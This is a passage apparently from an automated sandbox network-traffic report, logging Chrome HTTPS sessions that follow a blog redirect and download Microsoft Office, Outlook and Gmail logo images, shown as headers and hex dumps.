                                                                                                Data Ascii: lCO$Cx^D~(?3"X=r@C8)?K{_r{i&?|F@ee.0L0@t9E"@-;@I~:t}VOT~N)5Q[d?s&!|'Lc`tr@#WN\?_7_9!JMQP


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.44976635.207.98.74434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:51 UTC609OUTGET /wp-content/uploads/2015/03/Bildschirmfoto-2015-03-18-um-16.58.00.png HTTP/1.1
                                                                                                Host: publishingblog.ch
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:51 UTC260INHTTP/1.1 301 Moved Permanently
                                                                                                Server: nginx
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 24
                                                                                                Connection: close
                                                                                                Location: https://publishing.blog/
                                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                X-Proxy-Cache-Info: DT:1
                                                                                                2025-01-08 06:22:51 UTC24INData Raw: 33 30 31 20 2d 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a
                                                                                                Data Ascii: 301 - Moved Permanently


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.44976878.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:52 UTC421OUTGET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:52 UTC287INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:52 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 12501
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-30d5"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:52 UTC12501INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 88 00 00 03 00 08 06 00 00 00 a7 dd 96 bb 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 20 00 49 44 41 54 78 9c ed dd fb 93 dd 77 7d e7 f9 d7 b7 bb 25 4b b6 31 96 75 b1 64 30 60 c2 dd 53 05 44 55 a1 24 b5 5d 32 c4 26 ce 60 ec 60 cb f8 26 f9 42 26 fb 6f ec af 99 ad d9 dd d9 99 a9 da ad 9a ad dd 5f 76 67 12 4d 26 40 2b 40 8c 61 05 6e d9 31 89 21 33 bb 18 08 8c 6c 63 b0 6c 75 cb f2 05 cb b2 d4 7d be fb c3 e9 16 fd 11 96 ad cb e9 fe 9c cb e3 51 95 1f 52 65 5a af 22 41 79 a6 bf e7 bc bf 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 2f 35 b5 07 00 30 1a 5e 9a cc fb e6 92 dd 4d 72 4f 92 17 db 26 7f 3d de e4 ab eb bf 9f e7 6a 6f 03 4a 02 11 80 65 f3 fc ce 6c 98 98 cb bd 4d b2 3b c9 d6 33 fc
                                                                                                Data Ascii: PNGIHDRbKGD IDATxw}%K1ud0`SDU$]2&``&B&o_vgM&@+@an1!3lclu}QReZ"Ay@/50^MrO&=joJelM;3


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.44977078.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:52 UTC410OUTGET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:52 UTC287INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:52 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 41401
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-a1b9"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:52 UTC16097INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 9a 08 06 00 00 00 4d 16 95 9f 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 20 00 49 44 41 54 78 9c ec dd 77 9c dd 75 9d 2f fe d7 39 53 92 49 32 e9 85 14 13 12 12 48 66 42 0d 58 c1 8a a2 08 3f 75 15 b0 ac 62 5b ac 08 59 1b bb 77 7f f7 b2 f7 de dd 85 bd d7 5d 57 d6 8a 0d 75 95 1f 36 54 d6 95 55 c1 05 12 10 b0 d1 45 90 26 84 96 84 14 92 4c 32 73 ce ef 8f 04 0c 25 12 92 93 f9 7e cf 39 cf e7 e3 81 4e 66 ce cc bc 88 4e 7b cd e7 fd fe 54 02 00 40 73 f8 c8 65 33 b2 a5 b2 38 a9 1f 98 7a 16 a7 52 59 9c a4 2f c9 c8 a2 a3 35 b9 f5 f9 e7 e7 f5 16 1d 02 00 d8 b1 ce a2 03 00 00 f0 38 1f be 72 af 0c 0e 1c 96 4a b5 2f f5 f4 27 95 25 49 7d 7e b6 a4 7b eb 03 2a 49 a5 d8 88 00 00 c3 49 81 05
                                                                                                Data Ascii: PNGIHDRMbKGD IDATxwu/9SI2HfBX?ub[Yw]Wu6TUE&L2s%~9NfN{T@se38zRY/58rJ/'%I}~{*II
                                                                                                2025-01-08 06:22:52 UTC16384INData Raw: e6 a8 e9 28 61 97 9e e8 d3 2b 37 96 6a 6a 19 f7 28 4e e2 92 09 42 0a 58 70 b7 e4 78 af ce 2b 61 7c 30 9c da bb 03 fa ff de a4 f8 80 d0 3c f9 e9 61 ed 6d ec 36 1d 23 e6 9d 35 22 4b f1 3e b7 dc 92 00 f6 5b bb b3 59 13 17 56 e9 60 6b 8f e9 28 00 1c ea 70 5b 8f 26 2d aa d6 ea ed cd a6 a3 84 5d 6e 6a 9c de 9a 59 ae 33 87 67 9a 8e 02 97 a2 80 05 57 3b bf 34 5b 69 89 3e d3 31 ac b2 f0 9d fd da df 4c e1 01 a1 e9 f1 07 b5 f8 dd 03 a6 63 c4 bc 8c 24 9f 4e 1b 9c 6e 3a 06 80 2f f9 b4 ae 4d e3 17 54 69 4f 63 97 e9 28 00 1c a6 ae a9 5b e3 17 54 e9 e3 bd ad a6 a3 84 5d 61 46 82 56 cf a9 d0 49 83 d2 4c 47 81 8b 79 25 b1 51 12 ae c5 e9 83 e1 d5 d6 ed d7 6f 57 ee 33 1d 03 96 b8 77 5d bd 3a 7a 02 a6 63 c4 bc b3 8a e9 52 05 9c 66 f3 c1 0e 8d 9b 5f a5 ad 87 18 d7 07 f0 85 6d
                                                                                                Data Ascii: (a+7jj(NBXpx+a|0<am6#5"K>[YV`k(p[&-]njY3gW;4[i>1Lc$Nn:/MTiOc([T]aFVILGy%QoW3w]:zcRf_m
                                                                                                2025-01-08 06:22:52 UTC8920INData Raw: 70 be fe b6 13 9a 1e 85 82 1c bc df 2c 31 8a 29 f3 e1 1f 3d 9a 3b 1e dd d6 f4 18 00 00 50 3c f7 58 e0 29 be 71 f7 c6 5c 75 7f 5f d3 63 00 1d 60 c5 86 a1 bc ff 07 8f 34 3d 06 00 00 b4 05 01 0b 9e e1 1d 5f 7a 20 db 47 77 7e 4d 0c 60 32 d4 75 f2 07 97 dd 9f 6d 13 5c 49 05 00 80 e9 d2 2e cb 2c 04 2c 78 86 e5 eb 87 f2 f7 d7 ac 69 7a 0c 60 06 fb e4 0d 6b f3 6f 0f f4 37 3d 06 00 00 b4 87 3a 95 80 05 3b f1 fe ef af ca a3 fd c3 4d 8f 01 cc 40 ab fb 86 f3 e7 df 78 a8 e9 31 00 00 a0 ad 08 58 b0 13 5b b6 8f e5 dd df 5c d9 f4 18 c0 0c f4 3f bf f1 50 fa 86 c6 9a 1e 03 00 00 da 8a 80 05 13 f8 dc cd eb f3 d5 3b 37 36 3d 06 30 83 7c e5 8e 0d b9 ec d6 c7 9b 1e 03 00 00 da 8e 80 05 cf e2 5d 5f 7d 30 fd 4e 4a 00 93 60 f3 e0 68 ce fe da 43 4d 8f 01 00 00 ed a7 aa ec c0 82 67
                                                                                                Data Ascii: p,1)=;P<X)q\u_c`4=_z Gw~M`2um\I.,,xiz`ko7=:;M@x1X[\?P;76=0|]_}0NJ`hCMg


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.44976978.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:52 UTC379OUTGET /uploads/gmail-email-logo-png-12.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:52 UTC287INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:52 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 29151
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-71df"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:52 UTC16097INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 71 a6 49 44 41 54 78 da ed 7d 07 78 55 65 ba 75 c6 02 48 8f 63 9d 19 9d eb ef 38 33 ea 14 db d8 bd 96 b9 23 1d d4 c1 8a 0a 82 bd a1 62 1f 95 de 9b 88 20 3a 8e 4a ef 24 f4 4e 20 88 4a 17 0d 84 1a 9a d4 e4 9c 93 90 a8 63 81 ef 7f df af 9c bd cf c9 49 48 39 65 97 f5 3e cf 7a 22 dc b9 9a e4 ec fd ad f5 bd 65 bd 69 69 08 04 c2 d1 b1 61 c5 07 27 12 ce 22 fc 99 70 0b e1 2e c2 e3 84 d7 08 7d 08 23 08 63 09 d3 08 0b 09 cb 09 6b 08 5b 08 3b 08 c1 28 7c 47 10 51 f8 2e c6 ff 6e 87 fe 77 ac d1 ff ce 85 fa bf 31 56 ff 37 fb e8 ef e1 71 fd 3d dd a2 bf 47 fe 5e 4f c4 27 87 40 20 10 08 44 d9 e4 de 90 f0 17 42 73 c2 13 84 9e 84 51 84 c5 84 af 09 07 09 47 63 10 b6 d3 71
                                                                                                Data Ascii: PNGIHDRxqIDATx}xUeuHc83#b :J$N JcIH9e>z"eiia'"p.}#ck[;(|GQ.nw1V7q=G^O'@ DBsQGcq
                                                                                                2025-01-08 06:22:52 UTC13054INData Raw: 15 c1 bc a9 6c 14 14 17 8f 80 43 86 fc 4f 24 1c 05 11 43 00 78 5e 00 44 97 03 7e 28 b4 be 3f 33 22 98 f1 b6 9a 0e 90 e5 80 df 58 3d 01 e1 72 40 43 f8 04 38 29 ed df cc 96 f6 a7 3f 4b 7b 5f 72 7b dc c3 69 7f dd f0 97 cb 26 3f 7c db b7 a7 fd 1d 46 fe 10 00 40 65 8c 82 d6 65 8f a8 2e ef 30 e7 9f c8 02 e0 4c 90 30 04 80 af 04 40 74 39 e0 bf 45 91 22 40 96 03 1e 2d bd 3b 40 93 0c c8 d7 49 e3 7e 3a ed df c2 74 fb df a0 ec 7d e5 56 bf 4f 54 c3 1f 11 7e 4e ee a7 29 35 f9 81 00 80 00 88 9f 51 d0 5b 64 14 d4 3f 1e dc 73 26 0b 80 bf 80 84 21 00 7c 27 00 ec fb 03 4c 63 60 d1 01 db 74 c0 d0 a8 72 40 1d cb 23 80 57 e8 b6 a8 0f 02 4e a1 bd af 5c e2 d4 b4 ae 14 00 d6 9c 3f 9b fc b4 b5 bc fd 99 fc c9 db 5f a6 fc 37 e9 95 be 5f 39 93 fc 21 00 80 4a 4d 06 90 51 50 d6 ac 81
                                                                                                Data Ascii: lCO$Cx^D~(?3"X=r@C8)?K{_r{i&?|F@ee.0L0@t9E"@-;@I~:t}VOT~N)5Q[d?s&!|'Lc`tr@#WN\?_7_9!JMQP


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.44977278.46.22.254434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:52 UTC381OUTGET /uploads/red-email-mail-logo-png-8.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:52 UTC289INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:22:52 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 145460
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-23834"
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Accept-Ranges: bytes
                                                                                                2025-01-08 06:22:52 UTC16095INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 24 00 00 03 2c 08 06 00 00 00 a5 59 66 69 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 04 67 41 4d 41 00 00 b1 8e 7c fb 51 93 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 02 37 aa 49 44 41 54 78 da ec c1 31 01 00 00 08 c0 20 ed 1f 7a c6 f0 01 b6 1a 00 00 80 0f 27 00 3b 74 4c 03 00 00 c0 30 28 99 7f d1 95 b1 07 24 30 05 00 00 c0 4b 02 b0 5f c7 02 00 00 00 00 83 fc ad 87 b1 a7 2c 12 12 00 00 60 93 00 ec d7 b1 00 00 00 00 c0 20 7f eb 61 ec 29 8b 84 04 00 00 d8 24 80 00 ec d7 b1 00 00 00 00 c0 20 7f eb 61 ec 29 8b 84 04 00 00 d8 24 80 00 ec d7 b1 00 00 00 00 c0 20 7f eb 61 ec 29 8b 84 04
                                                                                                Data Ascii: PNGIHDR$,YfipHYs.#.#x?vgAMA|Q cHRMz%u0`:o_F7IDATx1 z';tL0($0K_,` a)$ a)$ a)
                                                                                                2025-01-08 06:22:52 UTC16384INData Raw: 34 8f c8 5e 95 aa 42 c5 10 cc 92 c0 64 76 ce ac de 9f 7b 4f 38 4e d8 b0 21 7e e3 d0 93 8d 37 27 96 e3 84 6d e6 37 c9 bf 74 dd 81 91 27 b6 26 4f 81 89 42 c9 0f 80 a4 04 25 32 f1 6d 73 61 70 2f 98 dc c7 34 86 3e c6 49 2f fa 3d ed 02 68 b4 43 32 98 c0 bc 79 c0 16 11 e3 16 60 06 f2 80 67 2a f4 13 b5 88 d9 c4 8e ed 26 f6 d1 ce c8 28 18 c0 8e 08 a5 cb b2 b0 89 23 9f 8e 05 5e 5a 85 d4 09 61 00 76 3e c0 1d 10 10 0d 5d 92 05 5e 96 85 7c 49 21 e8 62 43 50 27 04 d8 41 01 cd 82 30 4b 4b 83 67 42 46 c1 28 18 6a 00 b4 4c eb c7 f9 f3 0c 5f 8f 1e 65 f8 75 e3 06 d6 65 5d c8 b3 26 e0 8e 09 74 e0 8a 11 7a cf 09 48 1d 13 da 1d 27 f8 30 03 91 72 0c 0c e4 9d da 35 da 31 19 05 64 75 4a e0 95 c6 7f bc 4b b7 90 3b 24 50 7a 07 90 f2 11 1b bd 34 71 c0 00 40 00 8d 76 48 06 57 87 a4
                                                                                                Data Ascii: 4^Bdv{O8N!~7'm7t'&OB%2msap/4>I/=hC2y`g*&(#^Zav>]^|I!bCP'A0KKgBF(jL_eue]&tzH'0r51duJK;$Pz4q@vHW
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: ad 1b 60 98 ba 4f d5 0a 91 b5 42 49 10 49 ac b8 fd 48 dc 1c 65 13 22 25 ca 33 89 47 a3 74 6f 04 45 08 86 6a 35 0d 64 88 b2 2c 4b 28 ba 0e 0c 92 b6 76 5a f0 be c8 b5 ef 3f 62 04 8d 28 5a 35 cc 79 46 fc 30 2d 8d 4a c4 91 b3 5c e2 cf 09 74 b2 16 d7 b6 10 be 31 99 25 65 71 64 2c 8d 80 b4 d6 b8 45 c7 80 9e 1c 52 12 35 9a 40 8a f1 da 69 22 22 55 8c 68 02 4c fa 97 2c 20 12 53 4c 8b cb 4e ed 93 0b 9b 6f f7 69 84 b6 a9 60 06 a9 3e 96 e4 b5 a8 a7 1c 19 c0 d3 eb 0c 33 2e 43 ef 89 c2 75 b6 0e 89 ca 1a 11 f5 50 94 dc 87 61 37 f3 e4 65 1c a1 6e db 89 ba 45 86 a7 49 0f e7 4e cf d3 a3 70 c5 00 08 38 c0 41 68 7d 93 1c 75 07 8d eb 77 04 4a ce cc 1b 5f 73 95 43 db c2 e1 f6 9a f7 bc 7f 5f de 02 68 f8 cd 90 b4 b4 80 ca c2 64 9c 9b d9 b1 cd 8e 20 cf 8c c0 e4 90 6f 65 1f ed 88
                                                                                                Data Ascii: `OBIIHe"%3GtoEj5d,K(vZ?b(Z5yF0-J\t1%eqd,ER5@i""UhL, SLNoi`>3.CuPa7enEINp8Ah}uwJ_sC_hd oe
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: 81 ad f3 41 48 1e 63 33 3b 68 b9 16 e8 a8 5f d0 88 3a 6c 76 c4 d0 70 58 85 15 ec 98 5f d0 8c 08 17 da 31 bf b8 2e 06 23 67 66 04 a3 03 43 e0 88 5f 7c f7 8b e0 db c4 8e ab e3 c9 00 8d 4f f0 26 76 d0 12 2d d0 a9 5a a0 ce 08 ec 78 5f 3b bb d1 13 b5 a8 08 3e 7d fc c8 b0 6d c3 06 70 07 64 07 90 fe f8 e1 03 4e b5 d8 46 cf 70 2d c5 c3 b6 b4 e3 19 b0 73 b3 12 98 8e 41 18 04 40 b3 26 1e 01 01 0c 11 09 09 a3 9d 93 a1 d8 79 45 5b ae 85 7c e4 2f 31 9d 0e 9c 9d 10 46 46 bc 65 05 b6 f2 04 d7 2c 09 b6 19 92 ff 0c b8 37 c4 c3 66 49 fe 82 f6 90 80 3a 24 20 31 60 67 e4 1f b0 5c 7a 73 f8 f0 90 8d 2b 25 7d 7d 06 4e 01 01 86 df c0 fc 4d 68 d9 16 a1 fd 23 0c 44 74 4c b0 75 2c 90 3b 26 c8 34 31 03 1c a3 80 76 9d 12 5c 17 89 c2 2e 48 04 2f 61 64 c0 5c 26 09 8d 53 d0 4d c4 8b e9
                                                                                                Data Ascii: AHc3;h_:lvpX_1.#gfC_|O&v-Zx_;>}mpdNFp-sA@&yE[|/1FFe,7fI:$ 1`g\zs+%}}NMh#DtLu,;&41v\.H/ad\&SM
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: 30 5f 84 7a 8a d4 ed dc ee ae 57 cb d6 aa 82 8c 50 d7 72 07 46 76 c3 01 7f 3d 2b 9d 6f c9 3f 7f 64 2b 82 bb d4 8b 2d 25 88 2d e5 24 ab 92 85 96 74 4e da bf 43 b2 06 fe 08 c0 08 66 98 21 e2 3b 52 8a 45 7e 0e f0 47 66 ba b7 6b 71 b9 5f 09 4c 5a 2a 23 1a 01 fe 4d 55 ad 96 34 12 f9 6b d5 fa e2 4f f1 08 8e 99 43 c2 64 7f 97 00 24 97 2a 20 6f 33 ad 11 da 2d 32 c0 d6 ca 88 19 48 56 00 4a 8f ca 89 f8 0e 6b 05 71 0a 67 22 53 84 f4 ac 06 99 e3 94 a4 cc 37 da c5 43 8c f1 c0 49 6b 2f 36 bc 6c 7e 31 47 3c 04 60 ef ea 52 00 84 41 b0 f5 b2 d3 ec fe 07 ea 20 85 a5 60 a1 e9 a2 41 0b 7d 9c 3d 04 15 ed 73 df 4f 5f 0d 89 04 1f 57 20 22 d7 99 ae 95 80 e4 b3 60 24 da 3f e5 5d 50 6a f2 4a 09 ed 23 eb 47 b0 16 d2 8f 30 17 3b 92 3f 12 49 6d b7 ac 35 67 f0 fd fa 23 56 bf 2b 01 12
                                                                                                Data Ascii: 0_zWPrFv=+o?d+-%-$tNCf!;RE~Gfkq_LZ*#MU4kOCd$* o3-2HVJkqg"S7CIk/6l~1G<`RA `A}=sO_W "`$?]PjJ#G0;?Im5g#V+
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: ac 18 d1 f1 07 0b 77 a4 4e c9 c7 a3 47 47 13 37 12 b0 f2 f7 47 59 b2 f5 87 84 b8 24 45 0d a1 8e 2a be 4e 2b d5 ef a8 21 a3 33 42 6c 18 80 93 1d 68 c9 0e f4 02 44 f0 b1 ae a0 25 3b d0 4d cc a0 4e 0a bb 99 19 03 13 68 d9 d6 28 20 08 60 17 22 62 db d0 8e ab d1 48 cc ec 08 23 d2 0d ed c4 74 46 f0 95 4d ff a1 71 0e 5e 9e 07 ec 70 32 00 3b 9e e0 fb 45 80 1d 11 66 50 67 04 b6 67 64 84 cd 8c 5c bd 78 11 7e e7 08 e8 68 5f d8 ec 08 ec 98 5f e4 b8 c4 d6 f9 c0 c6 c6 37 4b 42 ec ec 08 7a 27 84 81 81 bc d9 34 72 3b b5 a3 60 08 74 4a a0 77 90 a0 2f d9 42 df 33 fb 1f d6 c6 a7 22 00 08 c0 de 19 eb 30 08 c3 40 f4 aa 4a 48 4c 1d d8 59 e8 cc dc ff ff 88 4a 8c fc 06 4a 95 12 2b 50 17 05 db 54 ad 54 da 58 62 61 62 08 c1 8f cb f9 3e 0b 24 de 77 66 08 e1 20 92 55 92 dd c0 8a 6a
                                                                                                Data Ascii: wNGG7GY$E*N+!3BlhD%;MNh( `"bH#tFMq^p2;EfPggd\x~h__7KBz'4r;`tJw/B3"0@JHLYJJ+PTTXbab>$wf Uj
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: 1d 55 f3 8f 1e b4 4e 84 a6 e2 98 dc 11 26 20 a5 e9 38 73 ec 5b 66 ab 56 99 57 24 05 ff 9a 31 b0 d4 eb fe 66 fa 03 a9 7d 17 2e 64 e7 bb 3c 87 55 6c f3 41 0f da 41 cd d0 10 49 c6 12 68 37 a8 20 22 32 e3 eb a9 08 28 5d 44 24 44 46 5c 89 07 bb 50 91 11 74 20 22 d0 26 75 b5 3d f7 59 22 a2 c5 1a 80 f0 14 e6 3e 99 da 5f 15 0d 43 81 93 8f 72 24 6f aa ef fb 1d a2 ac ec 0e 74 2b f6 9b a5 f0 9b 35 0d 61 3a 22 09 89 f1 a5 05 df af a6 6c 2d 0e 55 75 fa f6 7b dd 05 60 ef 6c 52 10 86 81 28 3c e9 cf 42 97 2e ba ee 19 5c 79 0d 4f 20 14 77 1e a2 57 e9 d6 03 e8 65 bc 81 1b 71 a1 05 2d e8 4c 4c 74 a8 99 92 0a d2 52 1a 98 4d 0b 22 38 99 bc 2f be 49 fa 0a 24 21 7e ab 23 26 e2 4c 27 a3 85 10 1e bc 5f 84 37 bd f3 18 81 a4 33 20 01 f0 b7 6d 49 d6 ad 0a be 2d 3f 77 03 24 f6 9e 8e
                                                                                                Data Ascii: UN& 8s[fVW$1f}.d<UlAAIh7 "2(]D$DF\Pt "&u=Y">_Cr$ot+5a:"l-Uu{`lR(<B.\yO wWeq-LLtRM"8/I$!~#&L'_73 mI-?w$
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: 6a b4 23 42 01 58 b9 70 21 43 5e 42 02 7c c9 93 08 b4 43 22 c0 80 b8 6b 04 d7 6c 05 a1 99 11 7a dd cc ce c8 40 fa 66 76 86 61 da 21 21 65 76 04 bd 43 42 60 76 24 1d d8 19 99 35 dc d2 3f 40 00 8d 94 0e 09 1b d0 97 f7 80 09 5b 1a df 5e 12 9c 1b dc 47 c1 a0 e8 90 60 eb 98 10 73 37 09 29 a7 6e e1 db 4b 82 6d 3f 09 f2 68 07 6c f9 16 ac 20 91 1a ed 94 50 1d 7c bb 76 8d e1 fd b6 6d 0c 5f 4e 9f 86 e4 51 a4 0d f0 f0 e5 5c a0 8e 08 6c 39 17 6c d6 04 74 74 30 74 49 17 58 0f 5a e7 84 98 4a 92 dc cd df b8 1a f9 d4 b8 4f 82 94 fb 48 f0 a9 a1 a4 23 32 90 8d 06 52 3b 26 f8 d4 fc a7 50 2d b9 9d 02 4a 3b 2f a4 2e 29 43 29 4f a1 7b 43 c0 37 aa 83 2e 32 04 2d b9 e2 e5 05 77 44 c0 33 22 a0 cd ea a0 4e 08 74 93 3a 68 c9 16 b8 23 02 9a 39 01 76 3c 98 81 72 cc aa aa a3 a7 66 51
                                                                                                Data Ascii: j#BXp!C^B|C"klz@fva!!evCB`v$5?@[^G`s7)nKm?hl P|vm_NQ\l9ltt0tIXZJOH#2R;&P-J;/.)C)O{C7.2-wD3"Nt:h#9v<rfQ
                                                                                                2025-01-08 06:22:53 UTC14677INData Raw: 4a 3a 1f 94 de a6 ce 48 64 fc 8f ee 13 a1 6e fd 84 3e 2b f2 1b ad 33 02 5a 86 f5 09 da 19 41 be fc f0 1d 94 fd 09 aa 1e 4f f9 01 9a 3c 01 6d 62 bf 3c 1a ea 83 17 00 04 d0 68 87 64 08 82 15 4c 4c 7e 40 6a 23 f2 2c 09 72 a7 84 0d 47 87 04 f9 36 f7 d1 4e c9 68 c7 84 d2 8e 09 03 03 e1 bd 0b c4 f2 49 9d 41 a1 b4 73 42 96 3c 11 1d 14 72 d8 f8 96 65 51 72 fa 16 39 1d 11 6a cd 92 90 3b 43 42 cb 0e 09 3e 75 03 39 3b 42 8b 63 7e c9 69 c8 e3 9d 35 c1 71 c4 3c b1 1d 09 72 66 3b 88 bd 5d 9e 81 8c 8e 08 31 77 c2 8c 76 44 e8 df 19 f9 83 d6 19 01 f5 22 40 33 1f 5f 90 66 46 60 b3 23 6f 91 3a 23 04 4e d4 02 01 7f 60 67 64 d3 68 a8 0f 6e 00 10 40 a3 1d 92 a1 db 29 a9 00 52 ed 0c 68 9d 8b d1 4e c9 28 a0 45 c7 04 57 23 15 5f c3 96 d8 ce 0a b1 1d 15 72 30 29 9b e9 89 ed 68 e0
                                                                                                Data Ascii: J:Hdn>+3ZAO<mb<hdLL~@j#,rG6NhIAsB<reQr9j;CB>u9;Bc~i5q<rf;]1wvD"@3_fF`#o:#N`gdhn@)RhN(EW#_r0)h


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.44977135.207.98.74434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:52 UTC539OUTGET / HTTP/1.1
                                                                                                Host: publishing.blog
                                                                                                Connection: keep-alive
